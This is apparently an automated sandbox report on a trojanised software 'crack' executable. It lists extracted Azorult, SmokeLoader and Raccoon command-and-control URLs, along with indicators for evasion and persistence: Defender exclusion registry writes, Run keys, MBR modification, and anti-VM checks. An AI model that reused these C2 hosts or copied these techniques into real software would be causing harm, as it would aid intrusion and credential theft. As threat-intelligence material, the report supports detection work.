Analysis
-
max time kernel
162s -
max time network
165s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
13-02-2021 10:43
Static task
static1
Behavioral task
behavioral1
Sample
InterVations_RegCOPA_v1_crack.exe
Resource
win10v20201028
Behavioral task
behavioral2
Sample
InterVations_RegCOPA_v1_crack.exe
Resource
win10v20201028
Errors
General
-
Target
InterVations_RegCOPA_v1_crack.exe
-
Size
9.0MB
-
MD5
3ab10d617e0172bf28cd6ff364ed6507
-
SHA1
eddfc06d2c01acaad2d96bad0f8072c271ad5c9b
-
SHA256
d4b15a9eadea615530d8202f77fc2179e0dcafc375c72890be97e71ec06b58db
-
SHA512
34beb85c3138f4eb6efbbb3278540fcb7b34b6797be1d4258af2c48f1e0ee6fb934f82d90d48444a0354e3e28a1208cebd9327162e0390b3fe8897ad20acfadc
Malware Config
Extracted
azorult
http://kvaka.li/1210776429.php
Extracted
smokeloader
2020
http://naritouzina.net/
http://nukaraguasleep.net/
http://notfortuaj.net/
http://natuturalistic.net/
http://zaniolofusa.net/
http://4zavr.com/upload/
http://zynds.com/upload/
http://atvua.com/upload/
http://detse.net/upload/
http://dsdett.com/upload/
http://dtabasee.com/upload/
http://yeronogles.monster/upload/
Extracted
raccoon
17694a35d42ac97e2cd3ebd196db01b372cce1b0
-
url4cnc
https://telete.in/o23felk0s
Extracted
smokeloader
2019
http://10022020newfolder1002002131-service1002.space/
http://10022020newfolder1002002231-service1002.space/
http://10022020newfolder3100231-service1002.space/
http://10022020newfolder1002002431-service1002.space/
http://10022020newfolder1002002531-service1002.space/
http://10022020newfolder33417-01242510022020.space/
http://10022020test125831-service1002012510022020.space/
http://10022020test136831-service1002012510022020.space/
http://10022020test147831-service1002012510022020.space/
http://10022020test146831-service1002012510022020.space/
http://10022020test134831-service1002012510022020.space/
http://10022020est213531-service100201242510022020.ru/
http://10022020yes1t3481-service1002012510022020.ru/
http://10022020test13561-service1002012510022020.su/
http://10022020test14781-service1002012510022020.info/
http://10022020test13461-service1002012510022020.net/
http://10022020test15671-service1002012510022020.tech/
http://10022020test12671-service1002012510022020.online/
http://10022020utest1341-service1002012510022020.ru/
http://10022020uest71-service100201dom2510022020.ru/
http://10022020test61-service1002012510022020.website/
http://10022020test51-service1002012510022020.xyz/
http://10022020test41-service100201pro2510022020.ru/
http://10022020yest31-service100201rus2510022020.ru/
http://10022020rest21-service1002012510022020.eu/
http://10022020test11-service1002012510022020.press/
http://10022020newfolder4561-service1002012510022020.ru/
http://10022020rustest213-service1002012510022020.ru/
http://10022020test281-service1002012510022020.ru/
http://10022020test261-service1002012510022020.space/
http://10022020yomtest251-service1002012510022020.ru/
http://10022020yirtest231-service1002012510022020.ru/
Extracted
raccoon
027bc1bb9168079d5f7473eee9c05ee06589c305
-
url4cnc
https://telete.in/jjbadb0y
Extracted
metasploit
windows/single_exec
Extracted
raccoon
9ba64f4b6fe448911470a88f09d6e7d5b92ff0ab
-
url4cnc
https://telete.in/jagressor_kz
Signatures
-
Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
-
Glupteba Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/2152-275-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba behavioral1/memory/2152-278-0x0000000001570000-0x0000000001D72000-memory.dmp family_glupteba behavioral1/memory/2152-279-0x0000000000400000-0x0000000000C1B000-memory.dmp family_glupteba -
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral1/memory/4716-167-0x0000000002280000-0x00000000022AE000-memory.dmp family_redline behavioral1/memory/4716-169-0x0000000004A80000-0x0000000004AAC000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 4 IoCs
Processes:
svchost.exedescription pid process target process PID 5180 created 2152 5180 svchost.exe DF4E.exe PID 5180 created 4592 5180 svchost.exe csrss.exe PID 5180 created 4592 5180 svchost.exe csrss.exe PID 5180 created 4592 5180 svchost.exe csrss.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Modifies boot configuration data using bcdedit 15 IoCs
Processes:
bcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exebcdedit.exepid process 5388 bcdedit.exe 5980 bcdedit.exe 3380 bcdedit.exe 2164 bcdedit.exe 4328 bcdedit.exe 4516 bcdedit.exe 3140 bcdedit.exe 2160 bcdedit.exe 1912 bcdedit.exe 4424 bcdedit.exe 4072 bcdedit.exe 5936 bcdedit.exe 5384 bcdedit.exe 3880 bcdedit.exe 5212 bcdedit.exe -
Nirsoft 6 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Roaming\1613213258946.exe Nirsoft C:\Users\Admin\AppData\Roaming\1613213258946.exe Nirsoft C:\Users\Admin\AppData\Roaming\1613213263452.exe Nirsoft C:\Users\Admin\AppData\Roaming\1613213263452.exe Nirsoft C:\Users\Admin\AppData\Roaming\1613213268702.exe Nirsoft C:\Users\Admin\AppData\Roaming\1613213268702.exe Nirsoft -
XMRig Miner Payload 1 IoCs
Processes:
resource yara_rule behavioral1/memory/1180-333-0x0000000000A00000-0x0000000000AF1000-memory.dmp xmrig -
Creates new service(s) 1 TTPs
-
Drops file in Drivers directory 2 IoCs
Processes:
dsefix.execsrss.exedescription ioc process File created C:\Windows\system32\drivers\VBoxDrv.sys dsefix.exe File created C:\Windows\System32\drivers\Winmon.sys csrss.exe -
Executes dropped EXE 63 IoCs
Processes:
keygen-pr.exekeygen-step-1.exekeygen-step-3.exekeygen-step-4.exekey.exeSetup.exe6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe1613213258946.exe1613213263452.exe1613213268702.exeThunderFW.exeMiniThunderPlatform.exe23E04C4F32EF2158.exe23E04C4F32EF2158.tmpseed.sfx.exeseed.exe8B59.exefile.exe8D7C.exe93E6.exe9357.tmp.exe8B59.exe9D3E.exe9357.tmp.exeA175.exeA89A.exeBTRSetp.exeinstaller.exeB443.exeupdatewin1.exeBCD0.exeupdatewin2.exeGDIView.exeaabmhigo.exeupdatewin.exeC695.exe5760565.635260076.571405378.15BCD0.exe5.exeWindows Host.exejfiag3g_gg.exegdrrr.exejfiag3g_gg.exeDF4E.exeE308.exejfiag3g_gg.exejfiag3g_gg.exeDF4E.execsrss.exepatch.exe4695.tmp.exe4733.exe4763.tmp.exe4733.exe5108.tmp.exe51B5.exeSmartClock.exeSmartClock.exedsefix.exepid process 4440 keygen-pr.exe 4448 keygen-step-1.exe 4052 keygen-step-3.exe 4044 keygen-step-4.exe 1436 key.exe 1676 Setup.exe 672 6489A2274AE24900.exe 1500 6489A2274AE24900.exe 4700 md2_2efs.exe 4212 1613213258946.exe 4076 1613213263452.exe 68 1613213268702.exe 4264 ThunderFW.exe 4996 MiniThunderPlatform.exe 4580 23E04C4F32EF2158.exe 708 23E04C4F32EF2158.tmp 3012 seed.sfx.exe 4872 seed.exe 3148 8B59.exe 4836 file.exe 4384 8D7C.exe 876 93E6.exe 4564 9357.tmp.exe 1844 8B59.exe 4716 9D3E.exe 3196 9357.tmp.exe 1160 A175.exe 4320 A89A.exe 4184 BTRSetp.exe 3108 installer.exe 5160 B443.exe 5496 updatewin1.exe 5568 BCD0.exe 5664 updatewin2.exe 5704 GDIView.exe 5796 aabmhigo.exe 5880 updatewin.exe 6016 C695.exe 6084 5760565.63 6116 5260076.57 5140 1405378.15 2376 BCD0.exe 5504 5.exe 5604 Windows Host.exe 4176 jfiag3g_gg.exe 4772 gdrrr.exe 5228 jfiag3g_gg.exe 2152 DF4E.exe 5224 E308.exe 2136 jfiag3g_gg.exe 4660 jfiag3g_gg.exe 4812 DF4E.exe 4592 csrss.exe 4600 patch.exe 5248 4695.tmp.exe 4404 4733.exe 5280 4763.tmp.exe 4688 4733.exe 5600 5108.tmp.exe 5104 51B5.exe 5368 SmartClock.exe 5528 SmartClock.exe 5964 dsefix.exe -
Modifies Windows Firewall 1 TTPs
-
Possible attempt to disable PatchGuard 2 TTPs
Rootkits can use kernel patching to embed themselves in an operating system.
-
Sets service image path in registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\gdiview.msi office_xlm_macros -
Processes:
resource yara_rule C:\Program Files (x86)\Seed Trade\Seed\seed.exe upx C:\Program Files (x86)\Seed Trade\Seed\seed.exe upx behavioral1/memory/4680-272-0x0000000004D90000-0x0000000004D91000-memory.dmp upx behavioral1/memory/4688-305-0x0000000000400000-0x00000000047FC000-memory.dmp upx behavioral1/memory/4688-313-0x0000000000400000-0x00000000047FC000-memory.dmp upx -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
1405378.15description ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 1405378.15 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 1405378.15 -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
cmd.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Control Panel\International\Geo\Nation cmd.exe -
Drops startup file 1 IoCs
Processes:
4733.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk 4733.exe -
Loads dropped DLL 42 IoCs
Processes:
MsiExec.exe6489A2274AE24900.exeMiniThunderPlatform.exeseed.exe8D7C.exe93E6.exeA89A.exeBCD0.exe5.exeE308.exepatch.exe4763.tmp.exepid process 4704 MsiExec.exe 672 6489A2274AE24900.exe 672 6489A2274AE24900.exe 4996 MiniThunderPlatform.exe 4996 MiniThunderPlatform.exe 4996 MiniThunderPlatform.exe 4996 MiniThunderPlatform.exe 4996 MiniThunderPlatform.exe 4996 MiniThunderPlatform.exe 4996 MiniThunderPlatform.exe 4996 MiniThunderPlatform.exe 4872 seed.exe 4384 8D7C.exe 4384 8D7C.exe 876 93E6.exe 4320 A89A.exe 876 93E6.exe 876 93E6.exe 876 93E6.exe 876 93E6.exe 876 93E6.exe 2376 BCD0.exe 5504 5.exe 5504 5.exe 5224 E308.exe 4600 patch.exe 4600 patch.exe 4600 patch.exe 5224 E308.exe 5224 E308.exe 5224 E308.exe 5224 E308.exe 5224 E308.exe 5224 E308.exe 4600 patch.exe 5280 4763.tmp.exe 5280 4763.tmp.exe 5280 4763.tmp.exe 5280 4763.tmp.exe 5280 4763.tmp.exe 5280 4763.tmp.exe 5280 4763.tmp.exe -
Modifies file permissions 1 TTPs 1 IoCs
-
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
DF4E.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\DF4E.exe = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\HolyForest = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\wup = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0" DF4E.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0" DF4E.exe -
Processes:
resource yara_rule behavioral1/memory/5140-235-0x00000000009A0000-0x00000000009A1000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 4 IoCs
Processes:
8B59.exeC695.exe5260076.57DF4E.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\b10be062-653e-4280-8633-30e2d7899dec\\8B59.exe\" --AutoStart" 8B59.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" C695.exe Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe" 5260076.57 Set value (str) \REGISTRY\USER\S-1-5-21-3341490333-719741536-2920803124-1000\Software\Microsoft\Windows\CurrentVersion\Run\HolyForest = "\"C:\\Windows\\rss\\csrss.exe\"" DF4E.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
6489A2274AE24900.exe6489A2274AE24900.exemd2_2efs.exe1405378.15B443.exeSetup.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md2_2efs.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 1405378.15 Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA B443.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Setup.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
msiexec.exemsiexec.exedescription ioc process File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\Z: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\N: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\K: msiexec.exe File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\B: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\M: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\S: msiexec.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\X: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\F: msiexec.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\T: msiexec.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\O: msiexec.exe File opened (read-only) \??\E: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\P: msiexec.exe File opened (read-only) \??\Q: msiexec.exe File opened (read-only) \??\R: msiexec.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 127 api.2ip.ua 128 api.2ip.ua 138 api.ipify.org 149 api.2ip.ua 176 ip-api.com -
Writes to the Master Boot Record (MBR) 1 TTPs 5 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
Processes:
6489A2274AE24900.exe6489A2274AE24900.exeMiniThunderPlatform.exe51B5.exeSetup.exedescription ioc process File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 6489A2274AE24900.exe File opened for modification \??\PhysicalDrive0 MiniThunderPlatform.exe File opened for modification \??\PHYSICALDRIVE0 51B5.exe File opened for modification \??\PhysicalDrive0 Setup.exe -
Drops file in System32 directory 2 IoCs
Processes:
svchost.exedescription ioc process File created C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile:.repos svchost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
Processes:
Setup.exe1405378.15pid process 1676 Setup.exe 5140 1405378.15 -
Suspicious use of SetThreadContext 9 IoCs
Processes:
6489A2274AE24900.exe9357.tmp.exeBCD0.exeaabmhigo.exe4733.exeSmartClock.exesvchost.exedescription pid process target process PID 672 set thread context of 756 672 6489A2274AE24900.exe firefox.exe PID 672 set thread context of 3388 672 6489A2274AE24900.exe firefox.exe PID 672 set thread context of 932 672 6489A2274AE24900.exe firefox.exe PID 4564 set thread context of 3196 4564 9357.tmp.exe 9357.tmp.exe PID 5568 set thread context of 2376 5568 BCD0.exe BCD0.exe PID 5796 set thread context of 5532 5796 aabmhigo.exe svchost.exe PID 4404 set thread context of 4688 4404 4733.exe 4733.exe PID 5368 set thread context of 5528 5368 SmartClock.exe SmartClock.exe PID 5532 set thread context of 1180 5532 svchost.exe svchost.exe -
Drops file in Program Files directory 51 IoCs
Processes:
23E04C4F32EF2158.tmpseed.sfx.exemsiexec.exedescription ioc process File created C:\Program Files (x86)\HappyNewYear\lang\is-T01TN.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade seed.sfx.exe File created C:\Program Files (x86)\gdiview\gdiview\readme.txt msiexec.exe File opened for modification C:\Program Files (x86)\HappyNewYear\DreamTrip.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-PGC4M.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-5T0I2.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-8RI88.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-47SR8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-PBBO2.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-7AT98.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\gdiview\gdiview\GDIView.exe msiexec.exe File opened for modification C:\Program Files (x86)\HappyNewYear\seed.sfx.exe 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-8PU60.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-BRGSK.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-CGUDI.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-493KJ.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-ND8L8.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-7IUQD.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-RN6IA.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-S1IEU.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-BA7TE.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-7RULA.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-LC8AU.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-6D6FO.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-VTR15.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-K23BF.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-PLGFF.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\Seed Trade\Seed\__tmp_rar_sfx_access_check_259339187 seed.sfx.exe File created C:\Program Files (x86)\gdiview\gdiview\GDIView.chm msiexec.exe File created C:\Program Files (x86)\HappyNewYear\is-C2TKV.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-9134C.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-713F3.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-P0H28.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\lang\is-E10T2.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed\seed.exe seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-8A1AR.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-90ANL.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-BBQ42.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-K9DEG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-S8VH9.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-5ATFG.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-JM0QS.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-01D42.tmp 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\HappyNewYear\unins000.dat 23E04C4F32EF2158.tmp File opened for modification C:\Program Files (x86)\Seed Trade\Seed seed.sfx.exe File created C:\Program Files (x86)\HappyNewYear\is-3CCNC.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-HKLBK.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\is-67U4F.tmp 23E04C4F32EF2158.tmp File created C:\Program Files (x86)\HappyNewYear\images\is-K9HJO.tmp 23E04C4F32EF2158.tmp -
Drops file in Windows directory 14 IoCs
Processes:
msiexec.exeDF4E.execsrss.exeWerFault.exeMicrosoftEdge.exedescription ioc process File created C:\Windows\Installer\f74b089.msi msiexec.exe File created C:\Windows\Installer\f74b08b.msi msiexec.exe File created C:\Windows\rss\csrss.exe DF4E.exe File opened for modification C:\Windows\windefender.exe csrss.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\f74b089.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File created C:\Windows\Installer\SourceHash{9A2A452C-3057-4F5E-8C7F-41B0D566B831} msiexec.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\rss DF4E.exe File opened for modification C:\Windows\Installer\ msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSIB27D.tmp msiexec.exe File created C:\Windows\windefender.exe csrss.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Program crash 3 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4876 4700 WerFault.exe md2_2efs.exe 2232 6084 WerFault.exe 5760565.63 4680 5160 WerFault.exe B443.exe -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
svchost.exeseed.exeA89A.exe6489A2274AE24900.exe6489A2274AE24900.exeBCD0.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0055 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\000A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A svchost.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI seed.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI A89A.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_SANU&PROD_SANU_DVD-ROM\4&37CE57BA&0&010000 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\FriendlyName 6489A2274AE24900.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\ConfigFlags svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Mfg svchost.exe Key opened 